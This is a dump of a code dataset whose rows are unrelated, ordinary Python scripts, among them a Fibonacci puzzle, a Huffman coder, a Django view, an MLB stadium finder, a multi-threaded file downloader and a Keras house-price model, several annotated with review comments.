text stringlengths 38 1.54M |
|---|
import time


def sum_even_fibonacci(limit=4000000):
    """Return the sum of the even-valued Fibonacci terms not exceeding *limit*.

    Project Euler #2. The sequence starts 1, 2 as in the original script, and
    the local was renamed from ``sum`` to avoid shadowing the builtin.
    """
    fib = [1, 2]
    total = 2  # 2 is the first even term and is already in the list
    while fib[-1] < limit:
        fib.append(fib[-1] + fib[-2])
        if fib[-1] % 2 == 0 and fib[-1] < limit:
            total += fib[-1]
    return total


if __name__ == '__main__':
    # Timing and printing moved under the main guard so importing this
    # module no longer runs the computation as a side effect.
    start_time = time.time()
    print(sum_even_fibonacci())
    print("Elapsed Time: ", (time.time() - start_time))
from datetime import datetime

# Append one timestamp line per run.
# FIX: removed the pointless f.seek(0) — files opened in 'a' mode always
# write at end-of-file regardless of the seek position.
# NOTE(review): 'SatrtLog.log' looks like a typo for 'StartLog.log', but the
# name is kept since other tooling may already read this file — confirm.
with open('SatrtLog.log', 'a', encoding='utf-8') as f:
    f.write(str(datetime.now()) + '\n')
import datetime
import argparse
from collections import defaultdict
from http.server import HTTPServer, SimpleHTTPRequestHandler
from jinja2 import Environment, FileSystemLoader, select_autoescape
from pandas import read_excel
def create_parser():
    """Build the command-line parser locating the wine data workbook."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--path_to_file', '-ptf', default='',
                        help='''
Specify the full path to the
directory where your file is located
''')
    parser.add_argument('--file_name', '-f', default='wine.xlsx',
                        help='''You can specify the name of the file with data.
The name is specified together with the file type (only .xlsx)''')
    return parser
def main():
    """Render the wine catalogue from an Excel file and serve it on port 8000."""
    env = Environment(
        loader=FileSystemLoader('.'),
        autoescape=select_autoescape(['html', 'xml'])
    )
    template = env.get_template('template.html')
    this_year = datetime.datetime.now().year
    foundation_year = 1920
    winery_age = this_year - foundation_year
    parser = create_parser()
    parser_namespace = parser.parse_args()
    path_to_file = parser_namespace.path_to_file
    file_name = parser_namespace.file_name
    wines = read_excel(
        f'{path_to_file}{file_name}',
        na_values='nan',
        keep_default_na=False)
    wines = wines.sort_values('Категория')
    # FIX: pandas expects orient='records' (plural); the misspelled 'record'
    # raises ValueError on modern pandas versions.
    wines = wines.to_dict(orient='records')
    # Group rows by their category column for the template.
    grouped_wines = defaultdict(list)
    for wine in wines:
        grouped_wines[wine['Категория']].append(wine)
    rendered_page = template.render(grouped_wines=grouped_wines,
                                    winery_age=winery_age)
    with open('index.html', 'w', encoding="utf8") as file:
        file.write(rendered_page)
    # Serve the generated page (blocks forever).
    server = HTTPServer(('0.0.0.0', 8000), SimpleHTTPRequestHandler)
    server.serve_forever()


if __name__ == '__main__':
    main()
|
import pandas as pd
import os

# Merge per-country CSVs into the global reference dataset: for each
# converted country file, drop that country's existing rows from the
# reference frame and append the fresh rows instead.
global_df = pd.read_csv('data/raw/reference.csv')
for country in [name for name in os.listdir('data/converted') if name.endswith('.csv')]:
    print(f'fusing {country}')
    country_df = pd.read_csv(f'data/converted/{country}')
    # country[:-4] strips '.csv'; capitalize() assumes single-word country
    # names — NOTE(review): confirm multi-word names (e.g. 'United Kingdom')
    # never occur, since capitalize() lowercases every later word.
    global_df = global_df.drop(global_df.loc[global_df['Country/Region'] == country[:-4].capitalize()].index)
    global_df = pd.concat([global_df, country_df], ignore_index=True)
global_df.to_csv('data/fused.csv', index=False)
|
from django.shortcuts import HttpResponse
from rest_framework import generics, status, viewsets
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.status import HTTP_200_OK
from rest_framework.views import APIView
from .serializers import TriggerSerializer
from background_runner.task import sleepy, start_tracking
def index(request):
    """Queue a 30-second background task (``.delay`` suggests Celery — confirm)
    and return a static greeting page."""
    sleepy.delay(30)
    return HttpResponse("<h1>hi</h1>")
class Entry(object):
    """Plain value object carrying the fields serialized by TriggerSerializer.

    Any field missing from the keyword arguments defaults to None.
    """

    _FIELDS = ('start_url', 'start_page_number', 'category_id')

    def __init__(self, **kwargs):
        for name in self._FIELDS:
            setattr(self, name, kwargs.get(name))
class TriggerProcess(viewsets.ViewSet):
    """DRF viewset whose list() call kicks off the background tracking task.

    NOTE(review): list() reads request.data (a write-style payload on a read
    endpoint) and triggers a side effect — confirm this is intentional.
    """
    serializer_class = TriggerSerializer

    def list(self, request):
        # Coerce all three payload fields to strings before validation.
        start_url = str(request.data['start_url'])
        start_page_number = str(request.data['start_page_number'])
        category_id = str(request.data['category_id'])
        print(start_url)
        print(start_page_number)
        print(category_id)
        if start_url and start_page_number and category_id:
            print("calling..")
            # Hand off to the background worker; does not block the request.
            start_tracking.delay(start_url, start_page_number, category_id)
            # start_tracking(start_url, start_page_number)
        entries = {
            1: Entry(start_url=start_url, start_page_number=start_page_number, category_id=category_id),
        }
        # NOTE(review): serializer is built but its data is never returned —
        # the response below is a fixed success message; confirm intended.
        serializer = TriggerSerializer(instance=entries.values(), many=True)
        return Response({'success': True, 'message': 'tracking started successfully.'})
|
def star_rows(rows):
    """Return '*' lines forming an ascending then descending triangle.

    star_rows(2) -> ['*', '**', '**', '*']; star_rows(0) -> [].
    """
    ascending = ['*' * c for c in range(1, rows + 1)]
    descending = ['*' * c for c in range(rows, 0, -1)]
    return ascending + descending


def main():
    # FIX: prompt typo 'went' -> 'want'; the interactive read now lives in
    # main() so importing this module no longer blocks on stdin.
    print("Enter how many row you want to print: ")
    rows = int(input())
    for line in star_rows(rows):
        print(line)


if __name__ == '__main__':
    main()
###############################################################
# pytest -v --capture=no tests/test_inventory.py::Test_inventory.test_001
# pytest -v --capture=no tests/test_inventory.py
# pytest -v tests/test_inventory.py
###############################################################
from pprint import pprint
from cloudmesh.common.Printer import Printer
from cloudmesh.common.util import HEADING
from cloudmesh.common.util import banner
from cloudmesh.inventory.inventory import Inventory
import pytest
@pytest.mark.incremental
class Test_inventory:
    """Exercises Inventory add/save/read and the four list output formats."""

    def setup(self):
        # Runs before each test: fresh Inventory plus an info banner.
        self.i = Inventory()
        banner("Info")
        self.i.info()

    def test_inventory(self):
        HEADING()
        # Show the inventory in every supported output format.
        for output in ['dict', 'yaml', 'csv', 'table']:
            banner(output)
            print(self.i.list(format=output))
        banner("changing values")
        self.i.add(host="i1", cluster="india", label="india")
        self.i.add(host="i2", cluster="india", label="gregor")
        # "d[1-4]" presumably expands to hosts d1..d4 — confirm Inventory.add
        # supports bracket ranges.
        self.i.add(host="d[1-4]", cluster="delta", label="delta")
        banner("saving")
        self.i.save()
        for output in ['dict', 'yaml', 'csv', 'table']:
            banner(output)
            print(self.i.list(format=output))
        banner("reading")
        # Re-read from disk and verify the saved entries round-trip.
        n = Inventory()
        n.read()
        t = n.list('table')
        print(t)
        assert "gregor" in str(t)
        assert "+" in str(t)  # '+' characters indicate table borders
"""
# We need nostest for this
cms inventory list
cms inventory help
cms help inventory
cms inventory list d[1-3]
cms inventory list
cms inventory add d[1-3] --project=openstack
"""
|
import os
import threading
import hazelcast
from bokeh.io import curdoc
from bokeh.layouts import column
from bokeh.models import ColumnDataSource
from bokeh.models.map_plots import GMapOptions
from bokeh.plotting import gmap
# set up Hazelcast connection
hz_config = hazelcast.ClientConfig()
hz_config.network_config.addresses.append('member-1:5701')
hz_config.network_config.addresses.append('member-2:5701')
# retry up to 10 times, waiting 5 seconds between connection attempts
hz_config.network_config.connection_timeout = 5
hz_config.network_config.connection_attempt_limit = 10
hz_config.network_config.connection_attempt_period = 5
hz = hazelcast.HazelcastClient(hz_config)
# position map and lock
position_map = hz.get_map('ping_input') # remote hz map
# if we eventually end up with multiple map servers this should be a distributed lock
position_change_map_lock = threading.Lock()
position_change_map = dict() # changes accumulate in this local map
# color map and lock
color_map = hz.get_map('ping_output') # remote hz map
# if we eventually end up with multiple map servers this should be a distributed lock
color_change_map_lock = threading.Lock()
color_change_map = dict() # changes accumulate in this local map
# alpha change map and lock, used to hide expired entries
alpha_change_map = dict()
alpha_change_map_lock = threading.Lock()
# add a listener to position map to place all add/update events into the changeMap
def position_listener(event):
    """Record an added/updated position entry for the next UI refresh."""
    # No ``global`` needed: the dict is only mutated, never rebound.
    with position_change_map_lock:
        position_change_map[event.key] = event.value
def deleted_listener(event):
    """Mark an expired entry fully transparent so it disappears from the plot."""
    # No ``global`` needed: the dict is only mutated, never rebound.
    with alpha_change_map_lock:
        alpha_change_map[event.key] = 0.0
position_map.add_entry_listener(include_value=True, added_func=position_listener, updated_func=position_listener,
expired_func=deleted_listener)
# add a listener to position map to place all add/update events into the changeMap
def color_listener(event):
    """Record an added/updated color entry for the next UI refresh."""
    # No ``global`` needed: the dict is only mutated, never rebound.
    with color_change_map_lock:
        color_change_map[event.key] = event.value
color_map.add_entry_listener(include_value=True, added_func=color_listener, updated_func=color_listener)
# now retrieve all entries from the map and build a ColumnDataSource
values = [entry.loads() for entry in
position_map.values().result()] # apparently map.values() returns a concurrent.futures.Future
key_to_index_map = {ping['id']: i for (i, ping) in enumerate(values)} # given a key, return its position in values
latitudes = [entry['latitude'] for entry in values]
longitudes = [entry['longitude'] for entry in values]
ids = [entry['id'] for entry in values]
colors = ['gray' for c in range(len(latitudes))]
alphas = [1.0 for a in range(len(latitudes))]
data_source = ColumnDataSource({'latitude': latitudes, 'longitude': longitudes, 'color': colors, 'alpha': alphas})
# build the map
map_options = GMapOptions(map_type='roadmap', lat=39.98, lng=116.32, zoom=10)
p = gmap(os.environ['GOOGLE_MAPS_API_KEY'], map_options, title='Bejing')
p.circle('longitude', 'latitude', color='color', size=7, fill_alpha='alpha', line_width=0, source=data_source)
layout = column(p)
def update():
    """Periodic Bokeh callback: drain the three local change maps (under their
    locks) and apply everything to the ColumnDataSource in one patch call.

    Only entries whose id is already in the data source are patched; new ids
    are silently dropped — NOTE(review): confirm that is intended.
    """
    patches = dict()
    if len(position_change_map) > 0:
        with position_change_map_lock:
            entry_list = [entry for entry in [e.loads() for e in position_change_map.values()] if
                          entry['id'] in ids]  # in check is costly, can we do something better ?
            longitude_patches = [(key_to_index_map[entry["id"]], entry["longitude"]) for entry in entry_list]
            latitude_patches = [(key_to_index_map[entry["id"]], entry["latitude"]) for entry in entry_list]
            patches['longitude'] = longitude_patches
            patches['latitude'] = latitude_patches
            position_change_map.clear()
    if len(color_change_map) > 0:
        with color_change_map_lock:
            color_patches = [(key_to_index_map[k], v) for k, v in color_change_map.items() if
                             k in ids]  # in check is costly, can we do something better ?
            color_change_map.clear()
            patches['color'] = color_patches
    if len(alpha_change_map) > 0:
        with alpha_change_map_lock:
            alpha_patches = [(key_to_index_map[k], v) for k, v in alpha_change_map.items() if k in ids]
            alpha_change_map.clear()
            patches['alpha'] = alpha_patches
    if len(patches) > 0:
        data_source.patch(patches)
curdoc().add_periodic_callback(update, 500)
curdoc().add_root(layout)
|
# Purpose of this python coding is to show closest mlb stadium(if google place api works okay)
# Get information like gametime, home_away_team, probable pitcher
# Also, get directions to there
import googlemaps
import geocoder
from datetime import timedelta
import dateutil.parser
import statsapi # please, install statsapi first ## pip install MLB-StatsAPI ##
from bs4 import BeautifulSoup
gmaps = googlemaps.Client(key='Your API KEY')
mylocation = geocoder.ip('me')
origin = mylocation.latlng # GPS, my location
# origin = {'lat': 34.1899, 'lng': -118.4514} #Van Nuys, CA
# origin = {'lat': 40.7128, 'lng': -74.0060} #New York
# origin = {'lat': 41.8781, 'lng': -87.6298} #Chicago
# origin = {'lat': 37.7749, 'lng': -122.4194} #San Francisco
# origin = {'lat': 47.6062, 'lng': -122.3321} #Seattle
# origin = {'lat': 47.5515, 'lng': -101.0020} #North Dakota, where no human is.... index error exception
places_result = gmaps.places_nearby(
location=origin, keyword='mlb', radius=50000, open_now=False, type='stadium')
# each team id gets game info and check home game and get game info
def game_info_detail(team_id):
    """Print next-game details for *team_id*, noting when it is not a home game."""
    game_id = statsapi.next_game(team_id)
    home_game_check(game_id, team_id)
    game_info(game_id)
def game_info(gameid):
    """Print the next game's start time, date, teams and probable pitchers.

    PERF FIX: the schedule is fetched once and reused; the original issued a
    separate statsapi.schedule() network call for every printed field.
    """
    game = statsapi.schedule(game_id=gameid)[0]
    get_wrong_game_time = dateutil.parser.parse(game['game_datetime'])  # change datetime format
    # statsapi's time is 7 hours later, so timedelta is used.
    # NOTE(review): a fixed 7-hour offset ignores DST — confirm acceptable.
    adjust_game_time = get_wrong_game_time - timedelta(hours=7)
    game_time = adjust_game_time.strftime('%H:%M:%S')
    game_time_string = 'Next game will be at {} on {}'
    home_team_string = 'Home team, Probable Pitcher: {} // {}'
    away_team_string = 'Away team, Probable Pitcher: {} // {}'
    print(game_time_string.format(game_time, game['game_date']))
    print(home_team_string.format(game['home_name'], game['home_probable_pitcher']))
    print(away_team_string.format(game['away_name'], game['away_probable_pitcher']))
# home game check
def home_game_check(gameid, teamid):
    """Print a notice when *teamid* is the away side for game *gameid*."""
    if statsapi.schedule(game_id=gameid)[0]['away_name'] == statsapi.lookup_team(teamid)[0]['name']:
        print('There is no home game!')
# check stadium name is matched with specific teams name and get its info
# Maps Google Places stadium names to MLB statsapi team ids.
_STADIUM_TEAM_IDS = {
    'Angel Stadium of Anaheim': 108,
    'Dodger Stadium': 119,
    'Yankee Stadium': 147,
    'Citi Field': 121,
    'Globe Life Park in Arlington': 140,
    'Minute Maid Park': 117,
    'Oakland-Alameda County Coliseum': 133,
    'T-Mobile Park': 136,
    'Tropicana Field': 139,
    'Fenway Park': 111,
    'Rogers Centre': 141,
    'Oriole Park at Camden Yards': 110,
    'Target Field': 142,
    'Oracle Park': 137,
    'Progressive Field': 114,
    'Guaranteed Rate Field': 145,
    'Wrigley Field': 112,
    'Comerica Park': 116,
    'Kauffman Stadium': 118,
    'Miller Park': 158,
    'Busch Stadium': 138,
    'Great American Ball Park': 113,
    'PNC Park': 134,
    'Coors Field': 115,
    'Chase Field': 109,
    'Petco Park': 135,
    'SunTrust Park': 144,
    'Citizens Bank Park': 143,
    'Nationals Park': 120,
    'Marlins Park': 146,
}


def get_game_info():
    """Look up the first nearby stadium's team and print its next-game info.

    Replaces the original 30-branch if-chain with a dict lookup; behavior is
    identical (an unrecognized stadium name prints nothing).
    """
    name = places_result['results'][0]['name']
    team_id = _STADIUM_TEAM_IDS.get(name)
    if team_id is not None:
        game_info_detail(team_id)
# Resolve driving directions to the nearest stadium and print game + route info.
try:
    destination = places_result['results'][0]['geometry']['location']
    directions_result = gmaps.directions(origin, destination)
    # Check if there is only one stadium nearby
    if places_result['results'][0] == places_result['results'][-1]:
        print('Closest mlb stadium is: ', places_result['results'][0]['name'])
        print("")
        get_game_info()
        print("")
        print('distance is :',
              directions_result[0]['legs'][0]['distance']['text'])
        print('duration is :',
              directions_result[0]['legs'][0]['duration']['text'])
        print("")
        for step in directions_result[0]['legs'][0]['steps']:
            # used Beautifulsoup to get text only
            soup = BeautifulSoup(step['html_instructions'], 'html.parser')
            print(step['distance']['text'], ',', step['duration']['text'], ',', soup.get_text())
    else:  # If there are two results(I believe maximum 2 results are allowed, as long as I get right information)
        try:  # find closest one.
            destination_1 = places_result['results'][1]['geometry']['location']
            directions_result_1 = gmaps.directions(origin, destination_1)
            if int(directions_result[0]['legs'][0]['distance']['value']) < int(
                    directions_result_1[0]['legs'][0]['distance']['value']):  # comparison by distance value
                print("There are two mlb stadium near your location : ",
                      places_result['results'][0]['name'], ",", places_result['results'][1]['name'])
                print('Closest mlb stadium is: ',
                      places_result['results'][0]['name'])
                print("")
                get_game_info()
                print("")
                print('distance is :',
                      directions_result[0]['legs'][0]['distance']['text'])
                print('duration is :',
                      directions_result[0]['legs'][0]['duration']['text'])
                print("")
                for step in directions_result[0]['legs'][0]['steps']:
                    soup = BeautifulSoup(
                        step['html_instructions'], 'html.parser')
                    print(step['distance']['text'], ',',
                          step['duration']['text'], ',', soup.get_text())
            elif int(directions_result[0]['legs'][0]['distance']['value']) > int(
                    directions_result_1[0]['legs'][0]['distance']['value']):
                # NOTE(review): exactly-equal distances fall through silently,
                # and get_game_info() always reports results[0]'s team even
                # when results[1] is the closer stadium — confirm intended.
                print("There are two mlb stadium near your location : ",
                      places_result['results'][0]['name'], ",", places_result['results'][1]['name'])
                print('Closest mlb stadium is: ',
                      places_result['results'][1]['name'])
                print("")
                get_game_info()
                print("")
                print('distance is :',
                      directions_result_1[0]['legs'][0]['distance']['text'])
                print('duration is :',
                      directions_result_1[0]['legs'][0]['duration']['text'])
                print("")
                for step in directions_result_1[0]['legs'][0]['steps']:
                    soup = BeautifulSoup(
                        step['html_instructions'], 'html.parser')
                    print(step['distance']['text'], ',',
                          step['duration']['text'], ',', soup.get_text())
        except IndexError:
            pass
except IndexError:
    # index error unless there is result
    print('There is no mlb stadium nearby!')
|
codes={}
def frequency(text):
    """Return a dict mapping each character of *text* to its occurrence count.

    FIX: the parameter was renamed from ``str`` to avoid shadowing the
    builtin; every call site in this file passes it positionally.
    """
    freqs = {}
    for ch in text:
        freqs[ch] = freqs.get(ch, 0) + 1
    return freqs
def sortfreq(freqs):
    """Return (count, letter) pairs sorted ascending by count, then letter."""
    return sorted((count, letter) for letter, count in freqs.items())
def buildTree(tuples):
    """Collapse a sorted (freq, symbol) list into a single Huffman tree root.

    Repeatedly merges the two lowest-frequency nodes into a
    (combined_freq, (left, right)) node until one node remains.
    """
    nodes = list(tuples)
    while len(nodes) > 1:
        lo, hi = nodes[0], nodes[1]
        merged = (lo[0] + hi[0], (lo, hi))
        nodes = nodes[2:] + [merged]
        nodes.sort()
    return nodes[0]
def trimTree(tree):
    """Strip the frequency counts, leaving only the nested symbol structure."""
    payload = tree[1]
    if isinstance(payload, str):
        return payload
    return (trimTree(payload[0]), trimTree(payload[1]))
def assignCodes(node, pat=''):
    """Walk the trimmed tree, filling the global ``codes`` table with the bit
    pattern ('0' = left, '1' = right) leading to each leaf symbol."""
    global codes
    if isinstance(node, str):
        codes[node] = pat
    else:
        assignCodes(node[0], pat + "0")
        assignCodes(node[1], pat + "1")
    return codes
def encode(text):
    """Encode *text* via the global ``codes`` table; return the bit string.

    FIX: parameter renamed from ``str`` (shadowed the builtin); joined with
    str.join instead of quadratic '+=' concatenation.
    """
    return ''.join(codes[ch] for ch in text)
def decode(tree, bits):
    """Decode the bit string *bits* against the trimmed Huffman *tree*.

    FIX: second parameter renamed from ``str`` (shadowed the builtin).
    Walks left on '0', right on '1'; emits a symbol and restarts at the
    root whenever a leaf (plain string) is reached.
    """
    output = ''
    node = tree
    for bit in bits:
        node = node[0] if bit == '0' else node[1]
        if isinstance(node, str):
            output += node
            node = tree
    return output
# Demo driver.
# FIX: converted the Python 2 print statements to Python 3 calls (the rest of
# this snippet is already Python 3 compatible) and renamed the local ``str``
# to avoid shadowing the builtin.
sample = 'aaabccdeeeeeffg'
freqs = frequency(sample)
print('\nfrequency', freqs)
sorts = sortfreq(freqs)
print('\nsorted frequency', sorts)
tree = buildTree(sorts)
print('\nbuildtree', tree)
trim = trimTree(tree)
print('\ntrimtree', trim)
codes = assignCodes(trim)
print('\nassigncodes', codes)
compression = encode(sample)
print('\nencoding data', compression)
extraction = decode(trim, compression)
print('\ndecoding data', extraction, '\n')
|
#!/usr/bin/env python3
import sys
import os
import time
import urllib.request, urllib.parse, urllib.error
from threading import Thread
local_proxies = {'http': 'http://131.139.58.200:8080'}
class AxelPython(Thread, urllib.request.FancyURLopener):
    """Downloader thread fetching one byte-range of the target file.

    NOTE(review): FancyURLopener has been deprecated for years and is removed
    in recent Python — consider urllib.request.urlopen with a Range header.
    """

    def __init__(self, threadName, url, filename, ranges=0, proxies={}):
        # NOTE(review): mutable default ``proxies={}`` — harmless only if the
        # opener never mutates it; confirm.
        Thread.__init__(self, name=threadName)
        urllib.request.FancyURLopener.__init__(self, proxies)
        self.name = threadName
        self.url = url
        self.filename = filename   # temp file this part is appended to
        self.ranges = ranges       # (start, end) byte offsets for this part
        self.downloaded = 0        # bytes fetched so far (supports resume)

    def run(self):
        """Fetch the assigned byte range, appending chunks to the part file."""
        try:
            # Resume support: bytes already on disk count as downloaded.
            self.downloaded = os.path.getsize(self.filename)
        except OSError:
            self.downloaded = 0
        self.startPoint = self.ranges[0] + self.downloaded
        if self.startPoint >= self.ranges[1]:
            print('Part %s has been downloaded over.' % self.filename)
            return
        self.oneTimeSize = 16384  # 16kByte/time
        #print('task %s will download from %d to %d' % (self.name, self.startPoint, self.ranges[1]))
        self.addheader("Range", "bytes=%d-%d" % (self.startPoint, self.ranges[1]))
        self.addheader("Connection", "keep-alive")
        self.urlHandler = self.open(self.url)
        data = self.urlHandler.read(self.oneTimeSize)
        while data:
            # File reopened per chunk — presumably so progress is flushed to
            # disk between reads; confirm before changing.
            fileHandler = open(self.filename, 'ab+')
            fileHandler.write(data)
            fileHandler.close()
            self.downloaded += len(data)
            data = self.urlHandler.read(self.oneTimeSize)
class Download:
    """Multi-threaded HTTP downloader that fetches a file in ranged blocks
    and concatenates the temporary part files into the final output."""

    def __init__(self):
        self.complete = False  # True once all parts are merged
        self.process = None    # last reported completion percentage

    def getUrlFileSize(self, url, proxies={}):
        """Return the remote file size from the Content-Length header."""
        urlHandler = urllib.request.urlopen(url)
        return int(urlHandler.info()['Content-Length'])

    def splitBlocks(self, totalSize, blockNumber):
        """Split *totalSize* bytes into *blockNumber* inclusive (start, end) ranges.

        FIX: uses integer division — the original ``/`` produced float
        offsets under Python 3, yielding invalid Range headers.
        """
        blockSize = totalSize // blockNumber
        ranges = [(i * blockSize, i * blockSize + blockSize - 1)
                  for i in range(blockNumber - 1)]
        # The last block absorbs the remainder.
        ranges.append((blockSize * (blockNumber - 1), totalSize - 1))
        return ranges

    def isLive(self, tasks):
        """Return True while any download thread is still running."""
        # FIX: Thread.isAlive() was removed in Python 3.9; use is_alive().
        return any(task.is_alive() for task in tasks)

    def downLoad(self, url, output, blocks=6, proxies=None):
        """Download *url* into *output* using *blocks* parallel range requests.

        *proxies* defaults to the module-level ``local_proxies`` (now resolved
        at call time instead of at import time).
        """
        if proxies is None:
            proxies = local_proxies
        size = self.getUrlFileSize(url, proxies)
        ranges = self.splitBlocks(size, blocks)
        threadName = ["thread_%d" % i for i in range(blocks)]
        filename = ["tmpFile_%d" % i for i in range(blocks)]
        tasks = []
        for i in range(blocks):
            task = AxelPython(threadName[i], url, filename[i], ranges[i])
            task.daemon = True  # FIX: setDaemon() is deprecated since 3.10
            task.start()
            tasks.append(task)
        # NOTE(review): original indentation was ambiguous; the sleep is kept
        # after thread startup to let transfers begin before polling.
        time.sleep(2)
        while self.isLive(tasks):
            downloaded = sum(task.downloaded for task in tasks)
            process = downloaded / float(size) * 100
            show = '\rfileSize:%d Downloaded:%d Completed:%.2f%%' % (size, downloaded, process)
            self.process = process
            sys.stdout.write(show)
            sys.stdout.flush()
            time.sleep(0.01)
        self.complete = True
        # Merge the part files in order, then delete them (best effort).
        with open(output, 'wb+') as fileHandler:
            for part in filename:
                with open(part, 'rb') as f:
                    fileHandler.write(f.read())
                try:
                    os.remove(part)
                except OSError:  # FIX: was a bare except
                    pass
if __name__ == '__main__':
    # Example usage: fetch an Ubuntu ISO in 20 parallel blocks, no proxy.
    url = "http://ftp.ticklers.org/releases.ubuntu.org/releases//precise/ubuntu-12.04.2-server-i386.iso"
    output = 'ubuntu.iso'
    d = Download()
    d.downLoad(url, output, blocks=20, proxies={})
|
from type_check import ch_one
def test_ch_one():
    """ch_one should return the builtin type of its argument's value."""
    assert ch_one(2) == int
    assert ch_one(4 + 5.9) == float  # int + float promotes to float
    assert ch_one(5.0) == float
    assert ch_one(True and False) == bool
    first_name = 'Anand'
    last_name = 'S'
    assert ch_one(f'{first_name} {last_name}') == str
|
#loading need libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import stats
from sklearn.preprocessing import StandardScaler
def process_data(train):
    """Encode categoricals, expand the creation date, drop id/geo columns and
    impute missing numeric values.

    Returns a purely numeric DataFrame ready for outlier capping and scaling.
    Mutates *train* in place before narrowing to numeric columns.
    """
    categories = ['property_id', 'currency', 'property_type', 'place_name', 'state_name']
    for cat in categories:
        train[cat] = pd.Categorical(train[cat], categories=train[cat].unique()).codes
    # PERF: parse 'created_on' once (the original built a DatetimeIndex three times).
    created = pd.DatetimeIndex(train['created_on'])
    train['created_on_year'] = created.year
    train['created_on_month'] = created.month
    train['created_on_day'] = created.day
    # Keep only numerical columns and drop identifier/geo features.
    train_corr = train.select_dtypes(include=[np.number])
    del train_corr['id']
    del train_corr['geonames_id']
    del train_corr['lat']
    del train_corr['lon']
    train = train_corr
    train['floor'] = train['floor'].fillna(0)  # high missing ratio
    train['expenses'] = train['expenses'].fillna(train['expenses'].median())
    train['rooms'] = train['rooms'].fillna(train['rooms'].mean())
    train['surface_covered_in_m2'] = train['surface_covered_in_m2'].fillna(train['surface_covered_in_m2'].mean())
    # Missing totals fall back to the covered surface of the same row.
    train['surface_total_in_m2'] = train['surface_total_in_m2'].fillna(train['surface_covered_in_m2'])
    return train
def fit_transform_outliers(train):
    """Cap extreme values at each column's 99.9th percentile.

    Returns the (mutated) frame together with the list of caps so the same
    thresholds can later be applied to unseen data.
    """
    cols = ['floor', 'expenses', 'surface_covered_in_m2', 'surface_total_in_m2']
    qs = [train[col].quantile(0.999) for col in cols]
    for col, cap in zip(cols, qs):
        train.loc[train[col] > cap, col] = cap
    print(qs)
    return train, qs
def transform_outliers(train, qs):
    """Apply previously fitted percentile caps *qs* to the outlier columns."""
    cols = ['floor', 'expenses', 'surface_covered_in_m2', 'surface_total_in_m2']
    for col, cap in zip(cols, qs):
        train[col] = train[col].clip(upper=cap)
    print(qs)
    return train
def scale_data(train):
    """Standardize every column to zero mean / unit variance.

    Returns the scaled frame and the fitted scaler (for reuse on test data).
    NOTE: fit_transform returns a numpy array, so column names are lost.
    """
    scaler = StandardScaler()
    train = scaler.fit_transform(train)
    return pd.DataFrame(train), scaler
# ---- load training data and auxiliary features ----
train = pd.read_csv('features-training.csv')
test = pd.read_csv('target-training.csv')  # holds the 'price' target column
nlp = pd.read_csv('feature-nlp.csv')
values_from_title = pd.read_csv('feature_title.csv')
values_from_title['values'] = np.log1p(values_from_title['values'])  # log-scale
train = pd.concat([train, nlp['nlp'], values_from_title['values']], axis=1)
print(nlp.head())
test['price'] = np.log1p(test['price'])  # model is trained on log(1+price)
train = process_data(train)
train, qs = fit_transform_outliers(train)  # keep caps for the test set
train, scaler = scale_data(train)          # keep scaler for the test set
train = pd.concat([train, test['price']], axis=1)
print(train.head())
y = train['price']
del train['price']
X = train.values
y = y.values
from keras.layers import Input, Dense, BatchNormalization
from keras.models import Model, Sequential
from keras.layers import LeakyReLU
from keras.optimizers import Adam, RMSprop
from keras import backend as K
from keras.utils.vis_utils import plot_model
from keras.callbacks import LearningRateScheduler, TensorBoard, ModelCheckpoint
from sklearn.metrics import mean_squared_error
filename = 'house_prediction'
model = Sequential()
# ---- hyperparameters ----
ACTIVATION = 'relu'
EPOCHS = 12
BATCH_SIZE = 1024
LEARNING_RATE = 0.01
LOSS_FUNCTION = 'mean_squared_error'  # NOTE: unused — compile() uses RMSE below
BETA_1 = 0.9
BETA_2 = 0.999
EPSILON = 1e-08
EPOCHS_DROP = 3  # epochs between learning-rate drops
DROP = 0.1       # multiplicative LR decay factor
# ---- feed-forward regression net: 15 inputs -> 1 (log-)price output ----
model.add(Dense(512, input_dim=15, activation = ACTIVATION))
model.add(Dense(256, activation = ACTIVATION))
model.add(Dense(128, activation = ACTIVATION))
model.add(Dense(64, activation = ACTIVATION))
model.add(Dense(32, activation = ACTIVATION))
model.add(Dense(1))
def root_mean_squared_error(y_true, y_pred):
    """RMSE expressed in Keras backend ops (used as loss and metric)."""
    return K.sqrt(K.mean(K.square(y_pred - y_true)))
def step_decay(epoch):
    """Step-decay LR schedule; also snapshots the model every 10 epochs."""
    initial_lrate = LEARNING_RATE
    drop = DROP
    epochs_drop = float(EPOCHS_DROP)
    lrate = initial_lrate * np.power(drop,
                                     np.floor((1 + epoch) / epochs_drop))
    if epoch % 10 == 0:
        model.save(filename + "_graph_" + str(epoch))
    return lrate
lrate = LearningRateScheduler(step_decay)
tbCallBack = TensorBoard(log_dir='./' + filename, histogram_freq=0, write_graph=True, write_images=True)
filepath = "nlp_tabular_best"
# NOTE(review): monitor='val_loss' with mode='max' keeps the checkpoint with
# the HIGHEST validation loss; mode should almost certainly be 'min'/'auto'.
checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='max')
adam = Adam(lr=LEARNING_RATE, beta_1=BETA_1, beta_2=BETA_2, epsilon=EPSILON)
#rmsprop = RMSprop(lr=LEARNING_RATE)
model.compile (loss = root_mean_squared_error, optimizer = adam, metrics = ['mse', root_mean_squared_error])
model.fit (X, y, epochs = EPOCHS, batch_size = BATCH_SIZE, verbose = 1, callbacks=[lrate, tbCallBack, checkpoint], validation_split=0.1)
model.load_weights(filepath)  # restore the checkpointed weights
y_hat = model.predict(X)
print ("Total LMSE: " + str(mean_squared_error(y_hat, y)))
#y_hat = np.expm1(y_hat)
#np.savetxt('y_hat.csv', y_hat, delimiter=',', fmt=['%.10f'])
# ---- score the held-out/leaderboard set with the fitted pipeline ----
lb = pd.read_csv('features-test.csv')
nlp_test = pd.read_csv('nlp-test.csv')
values_from_title_test = pd.read_csv('title-test.csv')
values_from_title_test['values'] = np.log1p(values_from_title_test['values'])
lb = pd.concat([lb, nlp_test['nlp'], values_from_title_test['values']], axis=1)
id_lb = lb['id'].values.reshape((lb['id'].values.shape[0], 1)).astype(int)
lb = process_data(lb)
lb = transform_outliers(lb, qs)          # reuse caps fitted on train
lb = pd.DataFrame(scaler.transform(lb))  # reuse scaler fitted on train
y_lb = np.expm1(model.predict(lb.values))  # undo the log1p target transform
print (id_lb)
res = np.hstack([id_lb, y_lb])
